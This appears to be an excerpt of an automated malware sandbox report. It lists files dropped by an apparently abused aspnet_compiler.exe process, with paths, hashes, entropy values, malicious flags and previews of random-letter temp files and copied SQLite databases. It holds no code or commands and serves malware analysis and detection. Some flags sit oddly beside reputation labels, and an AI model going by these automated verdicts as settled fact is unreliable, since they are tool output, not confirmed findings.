SHA-256:	2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
SHA-512:	A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2412
Entropy (8bit):	5.341108361394489
Encrypted:	false
SSDEEP:	48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHjHKoLHG1V:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo67
MD5:	5D4B4A6BFACB854E7F2C4ADB625D1F71
SHA1:	FC542A0C19178B77638600EA36378BA3F64BC677
SHA-256:	170BA6EFCB3905EA4870D3771B9F38F64D079F8E3871032023B5EB6CAEF618B0
SHA-512:	BBC9AA745C2F44B5572EFA2B15FA45494E786F69339FC9ED8C52AAF7DA8AB3D48C24EF4106850892B9A711BA968DE71F11321CD1CAFE2F745A9CA7BAE4F197EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\tmp1881.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\tmp18B1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697125102277996
Encrypted:	false
SSDEEP:	24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
MD5:	207485EFCE70435971C31586A1E4CF97
SHA1:	245A410AEB767B099944A8E81F75FC9A4B270DFB
SHA-256:	BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
SHA-512:	A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
Malicious:	false
Preview:	QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

C:\Users\user\AppData\Local\Temp\tmp18B2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\Temp\tmp1920.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\tmp1921.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697125102277996
Encrypted:	false
SSDEEP:	24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
MD5:	207485EFCE70435971C31586A1E4CF97
SHA1:	245A410AEB767B099944A8E81F75FC9A4B270DFB
SHA-256:	BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
SHA-512:	A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
Malicious:	false
Preview:	QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

C:\Users\user\AppData\Local\Temp\tmp1951.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

C:\Users\user\AppData\Local\Temp\tmpA487.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA4F5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB95.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBF4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC33.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpC92.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCC2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2880737026424216
Encrypted:	false
SSDEEP:	192:Qo1/8dpUXbSzTPJPQ6YVucbj8Ewn7PrH944:QS/inojVucbj8Ewn7b944
MD5:	5F02C426BCF0D3E3DC81F002F9125663
SHA1:	EA50920666E30250E4BE05194FA7B3F44967BE94
SHA-256:	DF93CD763CFEC79473D0DCF58C77D45C99D246CE347652BF215A97D8D1267EFA
SHA-512:	53EFE8F752484B48C39E1ABFBA05840FF2B968DE2BCAE16287877F69BABE8C54617E76C6953A22789043E27C9CCA9DB4FED5D2C2A512CBDDB5015F4CAB57C198
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCF62.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD30.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
